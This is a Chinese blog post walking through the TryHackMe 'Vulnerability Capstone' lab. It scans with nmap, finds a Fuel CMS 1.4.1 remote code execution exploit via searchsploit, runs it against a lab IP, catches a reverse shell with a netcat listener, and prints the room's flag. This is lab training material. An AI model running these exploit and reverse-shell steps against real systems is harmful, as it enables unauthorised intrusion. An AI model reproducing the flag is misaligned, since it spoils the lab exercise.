TryHackMe-Vulnerability Capstone练习

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量427 收藏 5
点赞数 10
文章标签: 安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74606212/article/details/136070075
版权
本文指导如何在TryHackMe平台上通过Nmap扫描、searchsploit查找漏洞,利用FuelCMS1.4.1的远程代码执行漏洞进行攻击,最终获取flag。实践了Linuxweb应用漏洞利用过程。
摘要由CSDN通过智能技术生成

本文相关的TryHackMe实验房间链接:TryHackMe | Vulnerability Capstone

先nmap扫一下

接下来我们访问一下

接下来我们searchsploit找一下漏洞

searchsploit Fuel CMS

执行漏洞exp(此处使用TryHackMe中的box)

如果使用本地机需要下载exp:https://gist.github.com/anir0y/8529960c18e212948b0e40ed1fb18d6d#file-fuel-cms-py 

cd /usr/share/exploits/vulnerabilitiescapstone
python exploit.py 10.10.241.131

准备侦听

nc -lvnp 1234

shell_me
10.10.136.33:1234

找到目标文件: 

flag:THM{ACKME_BLOG_HACKED} 

答题:

fuel CMS 1.4.1 - Remote Code Execution (1) - Linux webapps Exploit (exploit-db.com)

 

参考:【THM】Vulnerability Capstone-练习 - Hekeatsll - 博客园 (cnblogs.com) 

orzw
关注
【THM】Vulnerability Capstone(漏洞顶点)-初级渗透测试
追风少年亚索的博客
04-06 341
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
【FCKeditor文件上传漏洞及利用 - File-Upload-Vulnerability-in-FCKEditor1】 本文主要探讨了FCKeditor(现称为CKeditor)中的PHP文件上传模块存在的安全漏洞,允许攻击者绕过文件类型检查,将恶意PHP代码上传到...
Tryhackme-Vulnerability Research
个人博客
10-15 592
Vulnerability Research 文章目录Vulnerability ResearchVulnerabilities 101Task1 IntroductionTask2 Introduction to VulnerabilitiesTask3 Scoring Vulnerabilities (CVSS & VPR)Task4 Vulnerability DatabasesTask5 An Example of Finding a VulnerabilityTask6 Showc
Tryhackme-Threat and Vulnerability Management
个人博客
08-13 1853
Threat and Vulnerability Management 文章目录Threat and Vulnerability ManagementNessustask1 Introductiontask2 Installationtask3 Navigation and Scanstask4 Scanning!task5 Scanning a Web Application!MIRETask1 Introduction to MITRETask2 Basic TerminologyTask3 ATT
Tryhackme-Simple CTF
个人博客
09-24 293
Simple CTF 文章目录Simple CTFTask1 Task1 1.How many services are running under port 1000? 2.What is running on the higher port? ssh 3.What’s the CVE you’re using against the application? CVE-2019-9053 NVD - CVE-2019-9053 (nist.gov) 4.To what kind of vulne
Tryhackme-Blaster
个人博客
10-22 1537
Blaster 文章目录BlasterTask1 Mission Start!Task2 Activate Forward Scanners and Launch Proton TorpedoesTask3 Breaching the Control RoomTask4 Adoption into the Collective Task1 Mission Start! Deploy the machine! This is a Windows box so give it a few minutes
Tryhackme-BurpSuite
热门推荐
个人博客
09-14 1万+
Burp Suite 文章目录Burp SuiteBurp Suite: The BasicsTask1 **Introduction** OutlineTask2 **Getting Started** What is Burp Suite?Task3 **Getting Started** Features of Burp CommunityTask4 **Getting Started** InstallationTask5 **Getting Started** The DashboardTask6
Tryhackme-Complete Beginner Introduction
个人博客
08-24 1226
Complete Beginner Introduction 文章目录Complete Beginner IntroductionLeaning Cyber Securitytask1 Web Application Securitytask2 Network Securitytask3 Learning RoadmapTutorialtask1 Starting your first machineStarting Out In Cyber Sectask1 Welcome To TryHackMeta
tryhackme-Bolt
qq_45414878的博客
10-02 411
tryhackme--Boltnmap 注:tryhackme的第二个靶机 nmap
TryHackMe - Source靶场
z4yn:)的博客
02-09 301
Source(Webmin) Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool. ##0x01 信息收集 利用Namp扫描端口,只开放了22,10000端口,切入点应该是10000端口 访问10000端口是个Webmin的登录页面,试了一下账号爆破均不行 ##0x02 寻找EXP 搜索一下公开的漏洞,看到MSF上集成有许多个RCE的EXP ...
Middleware-Vulnerability-detection:CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15
04-07
Middleware-Vulnerability-detection 实时更新较好用最新漏洞EXP,仅供已授权渗透测试使用 2020.4.18项目迎来两位伙伴一起维护 @caizhuang :beer_mug::beer_mug::beer_mug: @3ND:beer_mug::beer_mug::beer_mug: ...
zip-slip-vulnerability
08-31
Zip Slip漏洞详解 Zip Slip漏洞是一种严重影响的归档提取安全问题,它允许攻击者在系统上写入任意文件,通常导致远程命令执行。这个漏洞由Snyk Security团队在2018年6月5日公开披露之前发现,并影响了包括HP、...
Headless-Vulnerability-Detection
05-09
$ cd Headless-Vulnerability-Detection/ $ npm i puppeteer $ node main.js [target url] 去做 绝对核心功能 爬网整个网站并保存范围内的URL 在网页上获取所有表格 标识每个网页上每个表单上的所有入口点 ...
Spring-Boot-Vulnerability
03-08
Spring Boot漏洞(待续...) 0x01弹簧启动执行器裸露 执行器端点使您可以监视Spring应用程序并与之交互。 Spring Boot包含许多内置端点,您也可以添加自己的端点。 例如,运行状况端点提供基本的应用程序运行状况...
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 1152
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 677
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 1267
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
安全服务面试
m0_74402888的博客
09-28 592
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
解除CNC互锁操作指南-Web Vulnerability Scanner V8
"这篇文档是关于FANUC系列CNC系统的互锁机制,特别是当系统判断为非法测量操作时的处理方法。文档涉及到如何解除互锁状态,以及在不同条件下轴的移动限制。同时,它也提醒用户在解除互锁和报警之前,其他刀具补偿量...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值